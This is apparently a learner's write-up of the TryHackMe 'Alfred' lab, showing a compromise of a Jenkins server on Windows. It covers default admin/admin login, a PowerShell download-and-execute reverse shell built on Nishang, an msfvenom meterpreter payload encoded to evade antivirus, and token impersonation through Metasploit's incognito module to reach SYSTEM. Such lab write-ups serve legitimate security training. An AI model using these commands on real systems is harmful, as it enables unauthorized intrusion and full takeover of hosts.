###### tags: `TryHackMe OffensiveSecurity AdvancedExploitation` # Alfred :::info In this room, we'll learn how to exploit a common misconfiguration on a widely used automation server(Jenkins - This tool is used to create continuous integration/continuous development pipelines that allow developers to automatically deploy their code once they made change to it). After which, we'll use an interesting privilege escalation method to get full system access. Since this is a Windows application, we'll be using [Nishang](https://github.com/samratashok/nishang) to gain initial access. The repository contains a useful set of scripts for initial access, enumeration and privilege escalation. In this case, we'll be using the [reverse shell scripts](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) ::: ## Initial Access Here i start by scnnaning the target thanks to the command : - nmap -sC -sV IP  After browsing the webApp, i search for the default user and password of Jenkins on internet and i try them. :::success It works. :smile: ::: > Default login of **Jenkins** : > User : admin > Password : admin   Now i try to find a feature of the tool that allows me to execute commands on the underlying system. :::success I manage to find the feauture in Jenkins GUI where i can execute commands :::  Now i can use this command to get a reverse shell on my machine and then run it : `powershell iex (New-Object Net.WebClient).DownloadString('http://your- ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port` Before, I first need to download the Powershell script, and make it available for the server to download. I can do this by creating a http server with python. 1. Download the powershell script  2. Creating a http server  3. Listen to a TCP connection  4. Lunch the powershell comman  :::success I gain an initial access :::  ## Switching Shells To make the privilege escalation easier, let's switch to a meterpreter shell using the following process. ### msfvenom I use msfvenom to create a windows meterpreter reverse shell using the following payload : `msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe`  This payload generates an encoded x86-64 reverse tcp meterpreter payload. Payloads are usually encoded to ensure that they are transmitted correctly, and also to evade anti-virus products. An anti-virus product may not recognise the payload and won't flag it as malicious. After creating it, i download it to the machine using the same method in the previous step : `powershell "(New-Object System.Net.WebClient).Downloadfile('http://ip:8000/shell.exe','shell.exe')"`  Now Before running the program, i have to ensure that the handler is set up in metasploit :  I'm listening to the port which i created the payload xith `msfvenom`. Now let's run the program :   :::success Shells switched ! ::: ## Privilege escalations Now that we have initial access, let's use token impersonation to gain system access. Windows uses tokens to ensure that accounts have the right privileges to carry out particular actions. Account tokens are assigned to an account when users log in or are authenticated. This is usually done by LSASS.exe(think of this as an authentication process). This access token consists of: user SIDs(security identifier) group SIDs privileges amongst other things. More detailed information can be found [here](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-tokens). There are two types of access tokens: primary access tokens: those associated with a user account that are generated on log on impersonation tokens: these allow a particular process(or thread in a process) to gain access to resources using the token of another (user/client) process For an impersonation token, there are different levels: SecurityAnonymous: current user/client cannot impersonate another user/client SecurityIdentification: current user/client can get the identity and privileges of a client, but cannot impersonate the client SecurityImpersonation: current user/client can impersonate the client's security context on the local system SecurityDelegation: current user/client can impersonate the client's security context on a remote system where the security context is a data structure that contains users' relevant security information. The privileges of an account(which are either given to the account when created or inherited from a group) allow a user to carry out particular actions. Here are the most commonly abused privileges: SeImpersonatePrivilege SeAssignPrimaryPrivilege SeTcbPrivilege SeBackupPrivilege SeRestorePrivilege SeCreateTokenPrivilege SeLoadDriverPrivilege SeTakeOwnershipPrivilege SeDebugPrivilege There's more reading [here](https://www.exploit-db.com/papers/42556). I start by take a look at all the privileges using `whoami /priv`  I can see that three privileges(SeDebugPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege) are enabled. Let's use the incognito module that will allow us to exploit this vulnerability by entering : `load incognito`  To check which tokens are available, I enter the `list_tokens -g` command :  We can see that the *BUILTIN\Administrators* token is available. IuUse the `impersonate_token "BUILTIN\Administrators"` command to impersonate the Administrators token :  Even though I have a higher privileged token I may not actually have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do). I have to ensure that I migrate to a process with correct permissions. The safest process to pick is the `services.exe` process. First use the `ps` command to view processes and find the **PID** of the *services.exe* process. Migrate to this process using the command `migrate PID-OF-PROCESS` :  :::success I HAVE NOW THE ROOT PRIVILEGES. :::